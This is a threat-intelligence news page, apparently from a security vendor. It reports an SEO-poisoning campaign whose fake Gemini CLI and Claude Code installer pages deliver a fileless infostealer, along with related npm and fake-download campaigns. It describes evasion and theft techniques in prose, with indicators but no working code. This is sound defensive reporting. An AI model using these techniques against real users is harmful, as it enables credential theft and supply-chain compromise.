SEO-Poisoned Gemini CLI and Claude Code Installers Deliver Fileless Infostealer
Attackers are running an SEO-poisoning campaign that impersonates Gemini CLI and Anthropic Claude Code installation pages to infect Windows developer workstations with a fileless infostealer. The fake sites closely mimic legitimate setup instructions and trick victims into pasting a PowerShell one-liner that installs the real tool while silently executing malicious code in memory. EclecticIQ said the activity was first observed in early March 2026 and linked the Gemini and Claude lures to the same financially motivated actor through shared malware, infrastructure patterns, and social-engineering themes.
The malware disables ETW logging and bypasses AMSI, then steals credentials, session cookies, OAuth tokens, CI/CD secrets, VPN details, SSH material, and files from enterprise and collaboration platforms. It also fingerprints hosts, enumerates processes, dumps Windows Credential Manager data, and can receive follow-on remote code execution tasks from command-and-control servers, raising the risk of broader enterprise and software supply-chain compromise from a single infected developer endpoint. Researchers identified more than 30 related malicious domains and a wider impersonation cluster spoofing Node.js, Chocolatey, KeePassXC, and Monero, including infrastructure tied to IP 109.107.170.111 hosted by MIRhosting and domains tailored to U.S. and U.K. victims.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
7 events from the most recent confirmed update back to the earliest known activity.
ClickFix campaign expands to fake OpenAI Codex and Google Sites lures
Researchers identified an active ClickFix campaign using fake installer pages on Google Sites to impersonate Claude Code and OpenAI Codex. Victims are tricked into running an mshta command that launches a multi-stage PowerShell chain, extracts steganographically hidden shellcode from an image, and executes credential-stealing malware entirely in memory.
Cyderes discloses Claude Code ClickFix infostealer campaign
Cyderes Howler Cell disclosed a malicious campaign impersonating the Claude Code installation process, using SEO poisoning and ClickFix-style prompts to trick victims into running an MSHTA command. The attack retrieves an MP3/HTA polyglot and launches a mostly fileless .NET infostealer chain that steals browser credentials and communicates with a Russia-based C2 domain.
Media coverage highlights active developer-focused SEO poisoning campaign
Cyber Security News reported on EclecticIQ's findings, describing the active campaign's use of fake installer pages, fileless PowerShell malware, and theft of credentials, OAuth tokens, CI/CD secrets, VPN details, and session cookies. The coverage emphasized the risk that a single compromised developer workstation could enable broader enterprise compromise.
Researcher first spots Gemini and Claude SEO-poisoning campaign
Independent researcher @g0njxa first identified the malicious SEO-poisoning activity targeting developers searching for Gemini CLI and Claude Code installers. This public sighting preceded EclecticIQ's fuller analysis that later linked the fake software sites to a single financially motivated actor.
Campaign infrastructure expands to broader software impersonation domains
As the campaign developed, the same actor expanded beyond Gemini and Claude lures to impersonate Node.js, Chocolatey, KeePassXC, and Monero. Researchers identified more than 30 related malicious domains and linked infrastructure hosted on IP 109.107.170.111, with some domains tailored to U.S. and U.K. victims.
SEO-poisoning infostealer campaign first observed targeting AI developer tools
In early March 2026, a financially motivated campaign was first observed using SEO-poisoned fake sites impersonating Gemini CLI and Anthropic Claude Code. Victims were tricked into running PowerShell one-liners that installed the legitimate tool while executing a fileless infostealer in memory on Windows systems.
EclecticIQ links Gemini and Claude lures to one threat actor
EclecticIQ assessed that the Gemini CLI and Claude Code fake installer activity was conducted by the same actor based on shared malware, infrastructure patterns, and social-engineering themes. The report also documented the malware's credential theft, ETW and AMSI evasion, and remote code execution capability.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
8 references tracked. Mallory keeps watching after this page renders.
Hackers Use Fake Claude Code Install Page to Deliver Fileless .NET Infostealer
cybersecuritynews.com
Open sourceFake Claude Code Installer Via Google Sites Deliver Credential-Stealing Malware
cybersecuritynews.com
Open sourceFake Anthropic Sites Deliver Fileless Infostealer to Claude Code Users
hackread.com
Open source‘Claude Code install’ search result leads to ClickFix infostealer attack | news | SC Media
scworld.com
Open sourceFake AI tool websites used to steal developer data | brief | SC Media
scworld.com
Open sourceTrojanized Gemini and Claude Installers Target Developers Via SEO Poisoning
hackread.com
Open sourceHackers Use SEO Poisoning to Impersonate Gemini CLI and Claude Code Installers
cybersecuritynews.com
Open sourceSEO poisoning campaign leverages Gemini and Claude Code impersonation to deliver infostealer
blog.eclecticiq.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
Trojanized npm Packages Deliver OtterCookie to Steal AI Coding Tool Secrets
A malicious npm campaign used the account **`gemini-check`** to publish trojanized packages including **`gemini-ai-checker`**, **`express-flowlimit`**, and **`chai-extensions-extras`**, disguising them as legitimate developer utilities while delivering a staged JavaScript payload from Vercel-hosted infrastructure. Researchers linked the malware to **OtterCookie**, a modular Node.js backdoor associated with the DPRK-linked **Contagious Interview** activity cluster, citing overlaps in payload design, remote access capability, and data-theft behavior. The packages were downloaded more than 500 times in total, and while **`gemini-ai-checker`** was removed, the other packages were still available at the time of reporting. The malware executed code in memory to reduce detection and then stole browser credentials, cryptocurrency wallets, files, clipboard contents, and developer secrets. It also explicitly targeted directories tied to AI coding tools including **Cursor**, **Claude**, **Gemini CLI**, **Windsurf**, **PearAI**, and **Eigent**, enabling theft of API tokens, conversation logs, source code, SSH keys, and cloud credentials. The campaign shows a software supply-chain intrusion aimed directly at developers, with a particular focus on compromising AI-assisted development environments and the sensitive access they contain.
Apr 13, 2026
SEO Poisoning and Fake Software Downloads Used to Deliver Credential Theft and RAT Malware
Threat actors are using **software impersonation** and **SEO poisoning** to push victims toward fake download sites for trusted enterprise and IT tools, then delivering malware through trojanized installers. In one campaign, **Storm-2561** used spoofed VPN vendor pages for products such as **Pulse Secure, Fortinet, and Ivanti** to steal enterprise VPN credentials. The malicious packages were hosted on GitHub, signed with a certificate issued to **"Taiyuan Lihua Near Information Technology Co., Ltd."**, and designed to show an error before redirecting victims to the legitimate vendor site, reducing suspicion while exfiltrating credentials. A separate but closely related campaign used fake **FileZilla** download pages to distribute a **Remote Access Trojan** through multi-stage loaders and **DLL sideloading**. Attackers bundled legitimate FileZilla software with a malicious `version.dll`, or dropped the DLL during installation so the malware would execute while the expected application appeared to install normally. Both reports describe the same broader intrusion pattern: adversaries abusing trusted brands, realistic lookalike websites, and legitimate software packaging to compromise users who believe they are downloading authentic tools. A separate **Warlock** intrusion analysis describing web shells, lateral movement, tunneling, and ransomware activity is a different incident and does not match this malware-delivery story.
Apr 26, 2026
Credential-Theft Malware Campaigns Targeting Windows via Social Engineering and Trusted Services
Multiple reports describe **active malware campaigns targeting Windows users** with a focus on **credential, session, and wallet theft** delivered through social engineering and abuse of legitimate services. **CharlieKirk Grabber**, a Python infostealer packaged with *PyInstaller*, is distributed via phishing, cracked software, cheats, and social-media lures; it kills browser processes (via `TASKKILL`) to access credential stores, collects passwords/cookies/autofill/Wi‑Fi data, zips the loot, uploads it to *GoFile*, and relays the download link to operators via **Discord webhooks** or **Telegram bots**. Separately, attackers are buying **Facebook ads** impersonating Microsoft to drive victims to cloned Windows 11 download pages on lookalike domains (e.g., `ms-25h2-update[.]pro`), delivering a malicious installer that steals saved passwords, browser sessions, and **cryptocurrency wallet** data; the campaign uses **geofencing/sandbox evasion** to show benign content to data-center IPs while serving malware to likely end users. Other contemporaneous activity highlights broader Windows-targeted intrusion tradecraft and adjacent threats. FortiGuard Labs reported **Winos 4.0 (ValleyRat)** phishing campaigns in Taiwan using tax and e-invoice lures, with delivery chains including malicious **LNK** downloaders, **DLL sideloading**, and **BYOVD** using the vulnerable driver `wsftprm.sys`, supported by rapidly rotating domains and cloud hosting. In LATAM, a fake bank-receipt lure delivers **XWorm v5.6** via a `.pdf.js` double-extension WSH dropper that uses junk-padding and Unicode obfuscation, then reconstructs and runs PowerShell (spawned via WMI) and abuses trusted hosting (e.g., Cloudinary) for later stages—enabling credential theft and potential ransomware follow-on. Additional reporting covered a USB-propagating **Monero cryptomining** operation capable of crossing air-gapped environments, a new Linux **SysUpdate** variant with encrypted C2 traffic (and a Unicorn Engine-based decryption approach developed during DFIR), and the **Foxveil** loader abusing **Cloudflare Pages, Netlify, and Discord** to stage shellcode and persist via services or *SysWOW64* masquerading—these are separate threats but reinforce the trend of attackers blending into trusted infrastructure and common user workflows.
Mar 21, 2026